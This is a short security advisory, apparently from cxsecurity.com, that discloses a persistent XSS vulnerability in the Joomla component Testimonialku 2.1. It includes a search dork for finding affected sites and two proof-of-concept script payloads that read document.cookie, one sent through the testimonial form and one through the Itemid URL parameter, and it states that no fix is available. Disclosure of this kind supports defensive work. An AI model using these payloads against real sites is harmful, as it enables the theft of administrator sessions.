Joomla Component Testimonialku 2.1 Persistent XSS Vulnerability

Published
Credit
Risk
2011.07.27
v3n0m
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

Joomla Component Testimonialku 2.1 Persistent XSS Vulnerability

Author : v3n0m
Twitter : http://twitter.com/#!/coresetup
Discovered : July, 27-2011 GMT +7:00 Jakarta, Indonesia
Software : Testimonialku
Developer : http://www.joomlaku.com/
License : Non-Commercial
Version : 2.1 Lower versions may also be affected
Dorks : inurl:com_testimonialku
-----------------------------------------------------------------------

Software Description:
--------------------
Testimonialku is simple components and easy to use, useful for those
who want to add menus testimonials on your site each. Because of this
component is very simple, so there is no regulation on these components,
so you only need to install and publish it.

Poc I:
-----
Joomla component testimonialku (com_testimonialku) 2.1 is vulnerable to
persistent XSS in the administrator panel. A malicious user can submit a
testimonial containing <script> tags with absolutely no quotes and inject
that script into the administrator panel through any of the available
inputs except "email".

Fake Submission<script>alert(document.cookie)</script>

Now, when an administrator views the latest submissions, the script will
execute with that admin's permissions.

Poc II:
------
Attack Pattern: "><script>alert(document.cookie)</script>

index.php?option=com_testimonialku&Itemid="><script>alert(document.cookie)</script>

Solution:
--------
Fix not available

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com